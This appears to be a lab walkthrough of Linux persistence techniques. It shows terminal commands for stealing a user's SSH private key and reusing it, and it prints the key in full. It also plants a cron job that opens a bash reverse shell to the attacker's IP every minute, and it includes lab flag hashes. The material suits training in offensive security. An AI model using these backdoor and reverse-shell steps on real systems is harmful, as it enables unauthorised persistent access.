Copy ip -br -c a
192.3.140.2/24
Copy ls -al
drwxr-xr-x 1 student student 4096 Apr 29 13:40 .
drwxr-xr-x 1 root root 4096 Apr 26 2019 ..
-rw------- 1 student student 7 Apr 29 13:40 .bash_history
drwx------ 2 student student 4096 Apr 29 13:39 .cache
drwxr-xr-x 1 root root 4096 Apr 26 2019 .ssh
-rw-r--r-- 1 student student 91 Apr 26 2019 wait
cat wait
Delete this file to trigger connection reset.
Delete it only after planting the backdoor.
cd .ssh
ls
authorized_keys id_rsa
Copy cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA3JH1zC1WJuJ2KCPf1UdJe1dX+Uh4aE9RKsnuQk124eOB601/
8+Q6uJej38goVYQ7Dc4INK9Pq9cOs+uDQfRdjS1/9S7a0bDVORR6Q/E3dya0RDsz
LcaqX6LkPgnBZ2gS37E4mX6kiwEvYeqaAGyFqyfn+QPLos/Znc3EA4A71LPFg01b
AmpI6Gbaa7UUG+MCZoM0qDNo5Mzr5bmtCnVOKQ6n0Qx7znu5A2p00TfzmAo7erZ8
6xJUfXQoVFzqmINqhZKFZtjgV5nk/qHgn1BPyd6NoWeXADdIJKi7iq4jomT+Ny+/
HlxrAs1IJhxtrSExSMTkqmH/3KeX9ibBWXzY1QIDAQABAoIBAEO0liOvgvN6rlRR
9sJMGJVA0WNWyIcUWdDtnTJC/wwFvvqQlocx9oh1G7t0gFUHuuzY4pHxgl44LG40
C91x+kl8vvtu/4JAaqMT0xgJ8kGj4s/S8DnL8r5ajP8yFWj9fFWn27zaL/3vRjEj
R1R7+2f3XvCEJrz6Wk1jPRjqAvOeDRGH3ojsQwWO7k/FcvtqVBCPTGxyUBzXYv06
fM3OY5NL8D7t/bLoHa8dVhqjPnfUR7/IpiAdxEam1X0ObPB5YyBwSlpj6h904bF/
+U697IE23xjVmKMKcvTLe6QAxuRGSMf3/k3rCpDd3UxYF+P2e0CK3MefWjKpAe8r
2xRXyB0CgYEA+7zgmuhJqjik8tbt6b6+ZAJZ68TqLE1f3YEW/LivMeMj5tQZo/w+
0ZJnr6hR3eicMMxWKufGXSEtbs1TzMGvA5SXI9MTu62a5A2h7NDbLuKRwdjh9Qv6
TocFSMTSFcS4jvmbeYlVaSZWrJLLKY6lsjgdjDB4DH7Uc0Anxdr//GsCgYEA4E39
rlB7GWoCX7oXpSEGCHkQkmgX5IDU7+UUySFqD8fWoLsAc47R/TmDsKI+x83PF5jG
oo5P5LmUIeqnAKknTSyfD1YFtMa3tpTE68R9j/uueTK7v5izwWQjicmILm4RdkZJ
TVVH2b0aIQaUnpWWwHLa+BYx2jH4S2GxH89vz78CgYEA211SyApFLw0fR/Hc7kRm
OlYGL7qvaR2fvTDhbCYvnKRXQ61uDoUf5JXUvrBJbrtlZ+yX5dmE9OCVa6mHLbVV
oiQYtIIZ/wCgKbxrbybs6OVMqIQrGtNuMoHcK/Y/L/L19Lk0L2tqPy/GdamRWkxQ
vYXC0cfmxNS8oxWz0uktCrMCgYB6ufF9OMfBxgD6g4WAciss46CvmojIG71mbL8M
tV2kuMC0PN0oXRKELL3jHUKga/lNfefg9WC9UtS8IfmyINtCHJIDABwrJzdJjOiZ
326cIyb5ZUrYsCJaRAI117DNRqgDQL3GtEyV1CPBwin7Avny3mT0rKAmNIUYKaGS
OBuDXQKBgQDIRYOZEaV8rXx3wN24NYuByNUpRM3AIyPIwAuaPklWD6D2KdDveheI
lZtRb6Yzzmeon0DuLPdl7e/R7e5Z8Mx3o40aiJLULlw95JqON3J3W471PZAG1L/g
59PKgUMBNVX9UsUqvHyWlcY/FAT9UhWblgDoN3uXY9Db6q5x7hWzKw ==
-----END RSA PRIVATE KEY-----
Copy cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDckfXMLVYm4nYoI9/VR0l7V1f5SHhoT1Eqye5CTXbh44HrTX/z5Dq4l6PfyChVhDsNzgg0r0+r1w6z64NB9F2NLX/1LtrRsNU5FHpD8Td3JrREOzMtxqpfouQ+CcFnaBLfsTiZfqSLAS9h6poAbIWrJ+f5A8uiz9mdzcQDgDvUs8WDTVsCakjoZtprtRQb4wJmgzSoM2jkzOvlua0KdU4pDqfRDHvOe7kDanTRN/OYCjt6tnzrElR9dChUXOqYg2qFkoVm2OBXmeT+oeCfUE/J3o2hZ5cAN0gkqLuKriOiZP43L78eXGsCzUgmHG2tITFIxOSqYf/cp5f2JsFZfNjV root@localhost
Copy scp student@192.3.140.3:~/.ssh/id_rsa .
chmod 400 id_rsa
Copy ssh student@192.3.140.3
rm wait
# Old student's password do not work anymore
Copy ssh -i id_rsa student@192.3.140.3 689227a4f1b97afe1ff5ebaf85babc19
📌 Instead of using a user's private key, typically the attacker generates an SSH key pair on his system, keeps the private key on his system, transfers the public key onto the target system user's home .ssh directory and adds it in the authorized_keys file.
🔬 T1168: Local Job Scheduling
Persistence via Cron Jobs
Initial credentials: student :password
Copy ip -br -c a
192.175.36.2/24
Copy ls -al
drwxr-xr-x 1 student student 4096 Apr 29 14:04 .
drwxr-xr-x 1 root root 4096 Apr 26 2019 ..
-rw------- 1 student student 18 Apr 29 14:04 .bash_history
drwx------ 2 student student 4096 Apr 29 14:04 .cache
-rw-r--r-- 1 student student 91 Apr 26 2019 wait
cat wait
Delete this file to trigger connection reset.
Delete it only after planting the backdoor.
Copy echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/192.175.36.2/1234 0>&1'" > cron
crontab -i cron
crontab -l
Copy ssh student@192.175.36.3
rm wait
# Old student's password do not work anymore 79969e32981f722464fde4ce7f208883
